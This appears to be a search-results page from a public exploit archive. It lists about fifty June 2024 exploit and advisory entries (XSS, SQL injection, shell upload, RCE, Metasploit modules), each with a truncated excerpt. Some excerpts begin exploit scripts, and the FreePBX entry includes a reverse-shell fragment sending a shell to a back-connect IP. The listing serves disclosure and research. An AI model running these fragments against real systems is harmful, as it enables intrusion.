50697 matches found
SimpCMS 0.1 Cross Site Scripting
Exploit Title: SimpCMS v0.1 - Cross Site Scripting XSS Date: 26-06-2024 CVE: CVE-2024-39248 Exploit Author: Jason Jacobs 0xjasonjacobs Vendor Homepage: https://sourceforge.net/projects/simpcms/ Software Link: https://sourceforge.net/projects/simpcms/ Category: Web Application Version: 0.1...
Poultry Farm Management System 1.0 Shell Upload
Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution RCE Date: 24-06-2024 CVE: N/A Awaiting ID to be assigned Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html Software Link:...
Automad 2.0.0-alpha.4 Cross Site Scripting
Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting XSS Date: 20-06-2024 Exploit Author: Jerry Thomas w3bn00b3r Vendor Homepage: https://automad.org Software Link: https://github.com/marcantondahmen/automad Category: Web Application Flat File CMS Version: 2.0.0-alpha.4 Tested on:...
SolarWinds Platform 2024.1 SR1 Race Condition
Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition CVE: CVE-2024-28999 Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp...
Faronics WINSelect Hardcoded Credentials / Bad Permissions / Unhashed Password
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities allowing complete bypass product: Faronics WINSelect Standard + Enterprise vulnerable version: 8.30.xx.903 fixed version: 8.30.xx.903 CVE number:...
Paradox IP150 Internet Module 1.40.00 Cross Site Request Forgery
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Paradox IP150 Internet Module Cross-Site Request Forgery Link: https://github.com/sbaresearch/advisories/tree/public/2024/SBA-ADV-20240321-01ParadoxCrossSiteRequestForgery Vulnerability Overview The Paradox IP150 Internet Module in version 1.40.00 i...
Flatboard 3.2 Cross Site Scripting
Exploit Title: Flatboard v3.2 - Stored XSS Date: 2024-06-23 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://flatboard.org/ Version: 3.2 ---------------------------------------------------------------------------------------------------- 1-Login admin panel , go to this url :...
Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection
Title = Carbon Forum 5.9.0 - Multiple Exploits - Author = bRpsd [email protected] - Date Release = 22 June, 2024 - Vendor = Carbon Forum https://www.94cb.com/ Download = https://github.com/lincanbin/Carbon-Forum Vulnerable Versions = 5.9.0 = Tested Version = 5.9.0 on xampp Server. Vulnerability 1 :...
Netis MW5360 Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netis router MW5360 unauthenticated RCE.', 'Description' = %q Netis router MW5360 has a command injection vulnerability via the password paramete...
Edu-Sharing Arbitrary File Upload
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Arbitrary File Upload product: edu-sharing metaVentis GmbH vulnerable versions: =8.0.8-RC2, =8.1.4-RC0, =9.0.0-RC19 CVE number: CVE-2024-28147 impact: high homepage:...
Student Attendance Management System 1.0 SQL Injection
Titles: Student Attendance Management System-1.0 Bypass Authentication SQLi Author: nu11secur1ty Date: 06/22/2024 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html Reference:...
User Registration And Management System 3.2 SQL Injection
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title User Registration & Management System - SQLi .:. Google Dorks .:. inurl:loginsystem/index.php .:. Date: June 18, 2024 .:. Exploit Author: bRpsd .:. Contact: cyatlive.no .:. Vendor - https://phpgurukul.com/ .:...
Bagisto 2.1.2 Client-Side Template Injection
Exploit Title: Bagisto 2.1.2 Client-Side Template InjectionCSTI VueJS Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://forums.bagisto.com/ Version: 2.1.2 Tested on: https://demo.bagisto.com/ https://demo.bagisto.com/bagisto-common/search?query=77 49...
Apache OFBiz Forgot Password Directory Traversal
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache OFBiz Forgot Password Directory Traversal', 'Description' = %q Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal...
Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/eeb631127f1b9fb3d13d209d8e675634.txt Contact: [email protected] Media: x.com/malvuln Threat: Backdoor.Win32.Plugx Vulnerability: Insecure Permissions Family: Plugx Type: PE32 MD5:...
PHP CGI Argument Injection Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PHP CGI Argument Injection Remote Code Execution', 'Description' = %q This module exploits a PHP CGI argument injection vulnerability affecting P...
Microweber 2.0.15 Cross Site Scripting
Exploit Title: Stored XSS in Microweber Date: 06/18/2024 Exploit Author: tmrswrr Vendor Homepage: https://microweber.me/ Version: 2.0.15 Tested on: http://active.demo.microweber.me/ Vulnerability Description A Stored Cross-Site Scripting XSS vulnerability has been identified in Microweber version...
SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw
Exploit Title: Business Logic Flaw and Username Enumeration in spa-cartcmsv1.9.0.6 Date: 6/2024 Exploit Author: Andrey Stoykov Version: 1.9.0.6 Tested on: Ubuntu 22.04 Blog: https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html Description - It was found that the applicatio...
Payroll Management System 1.0 Remote Code Execution
Exploit Title: Payroll Management System v1.0 RCE Unauthenticated Google Dork: intitle:"Employee's Payroll Management System" Date: 16/06/2024 Exploit Author: ShellUnease Vendor Homepage: https://www.sourcecodester.com/ Software Link:...
WordPress RFC WordPress 6.0.8 Shell Upload
Exploit for Remote Code Execution RCE in RFC WordPress 6.0.8 import requests import sys target = "https://target.com" Exploit for Remote Code Execution RCE in RFC WordPress 6.0.8 CODE BY E1.Coders "The King of Security" def exploitrfcwordpress: url =...
Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting
Exploit Title: Premium Support Tickets For WHMCS Reflected XSS Exploit Author: Sajibe Kanti Vendor: ModulesGarden Vendor Homepage: https://www.modulesgarden.com/products/whmcs/premium-support-tickets Product Name: Premium Support Tickets For WHMCS Product Version: v1.2.10 Tested Version: WHMCS...
AEGON LIFE 1.0 SQL Injection
Exploit Title: Life Insurance Management System- SQL injection vulnerability. Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON...
AEGON LIFE 1.0 Cross Site Scripting
Exploit Title: Life Insurance Management Stored System- cross-site scripting XSS Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEG...
PHP Remote Code Execution
Exploit Title: PHP Windows Remote Code Execution Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://www.php.net/downloads.php Version: PHP 8.3, ', '' headers = 'User-Agent': 'Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:123.0 Gecko/20100101 Firefox/123.0', 'Content-Type':...
AEGON LIFE 1.0 Remote Code Execution
Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution RCE Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/...
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rejetto HTTP File Server HFS Unauthenticated Remote Code Execution', 'Description' = %q The Rejetto HTTP File Server HFS version 2.x is vulnerabl...
Cacti Import Packages Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cacti Import Packages RCE', 'Description' = %q This exploit module leverages an arbitrary file write vulnerability CVE-2024-25641 in Cacti versio...
Telerik Report Server Authentication Bypass / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/zip' class MetasploitModule 'Telerik Report Server Auth Bypass and Deserialization RCE', 'Description' = %q This module chains an authentication bypass...
Lost And Found Information System 1.0 Cross Site Scripting
Exploit Title: Stored Cross Site Scripting Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html...
Lost And Found Information System 1.0 SQL Injection
Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage:...
Quick CMS 6.7 Shell Upload
Title : Authenticated Shell Upload Product : Quick CMS Vendor : https://opensolution.org/ Affected Version : 6.7 Researcher : Eagle Eye Tested on : Window & Linux Date : 11/06/2024 Report : Already contact the vendor but no response Affected path : admin.php , core/common-admin.php,...
Quick Cart 6.7 Shell Upload
Title : Authenticated Remote Code Execution & Shell Upload Product : Quick Cart Vendor : https://opensolution.org/ Affected Version : 6.7 Researcher : Eagle Eye Tested on : Window & Linux Date : 11/06/2024 Affected path : admin.php , core/common-admin.php, database/config.php Affected function :...
Lost And Found Information System 1.0 SQL Injection
Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage:...
Lost And Found Information System 1.0 Cross Site Scripting
Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System Exploit Author: Amit Roy Rezur / AR0x7 Date: June 07, 2024 Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html...
XMB 1.9.12.06 Cross Site Scripting
Exploit Title: Persistent XSS in XMB 1.9.12.06 Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.xmbforum2.com/ Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip Version: 1.9.12.06 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent store...
Carbon Forum 5.9.0 Cross Site Scripting
Exploit Title: Persistent XSS in Carbon Forum 5.9.0 Stored Date: 06/12/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://www.94cb.com/ Software Link: https://github.com/lincanbin/Carbon-Forum Version: 5.9.0 Tested on: Windows XP CVE: N/A Vulnerability Details A persistent stored XSS...
VSCode ipynb Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VSCode ipynb Remote Development RCE', 'Description' = %q VSCode when opening an Jupyter notebook .ipynb file bypasses the trust model. On version...
Oracle Database Password Hash Unauthorized Access
Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role Product: Database Manufacturer: Oracle Affected Versions: 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c Tested Versions: 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c Risk Level: Medium Solution Status: Fixed CVE Reference:...
Kiuwan Local Analyzer / SAST / SaaS XML Injection / XSS / IDOR
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple critical vulnerabilities product: Kiuwan SAST on-premise KOP & cloud/SaaS Kiuwan Local Analyzer KLA vulnerable version: Kiuwan SAST 2.8.2402.3 Kiuwan Local...
SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure
CyberDanube Security Research 20240604-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| SEH utnserver Pro/ProMAX / INU-100 vulnerable version| 20.1.22 fixed version| 20.1.28 CVE number| CVE-2024-5420, CVE-2024-5421,...
FengOffice 3.11.1.2 SQL Injection
Exploit Title: FengOffice - Blind SQL Injection Date: 06/2024 Exploit Author: Andrey Stoykov Version: 3.11.1.2 Tested on: Ubuntu 22.04 Blog: https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html Steps to Reproduce: 1. Login to application 2. Click on "Workspaces" 3. Copy full U...
Online Pizza Ordering System 1.0 SQL Injection
Titles: opos-1.0 Multiple SQLi Author: nu11secur1ty Date: 06/07/2024 Vendor: https://github.com/oretnom23 Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html Reference: https://portswigger.net/web-security/sql-injection Description: The email...
Trojan.Win32.DarkGateLoader MVID-2024-0685 Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2024 Original source: https://malvuln.com/advisory/afe012ed0d96abfe869b9e26ea375824.txt Contact: [email protected] Media: x.com/malvuln Threat: Trojan.Win32.DarkGateLoader multi variants Vulnerability: Arbitrary Code Execution Description:...
Small CRM 1.0 SQL Injection
Exploit Title: Small CRM Developed using PHP and MySQL - SQLi Authentication Bypass Date: 05.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads Software Link: https://phpgurukul.com/small-crm-php Version: 1.0 Tested on: Windows 11, Kali...
Northwind Demo 1.0 Cross Site Scripting
Exploit Title: Northwind, company operations database - Cross-Site Scripting Reflected Date: 04.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://bigprof.com/appgini/free-open-source-web-applications Software Link: https://github.com/bigprof-software/northwind-demo Version: 1.0...
Small CRM 1.0 Cross Site Scripting
Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting Reflected Date: 05.06.2024 Exploit Author: Furkan Eren Tetik Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads Software Link: https://phpgurukul.com/small-crm-php Version: 1.0 Tested on: Windows 11, Ka...
Boelter Blue System Management 1.3 SQL Injection
Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management version 1.3 Google Dork: inurl:"Powered by Boelter Blue" Date: 2024-06-04 Exploit Author: CBKB DeadlyData, R4d1x Vendor Homepage: https://www.boelterblue.com Software Link:...
WordPress Hash Form 1.1.0 Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Hash Form Plugin RCE', 'Description' = %q The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical...
WBCE CMS 1.6.2 Remote Code Execution
Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution RCE Date: 3/5/2024 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.2.zip Version: 1.6.2 Tested on: MacOS import requests from bs4 import BeautifulSo...
FreePBX 16 Remote Code Execution
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...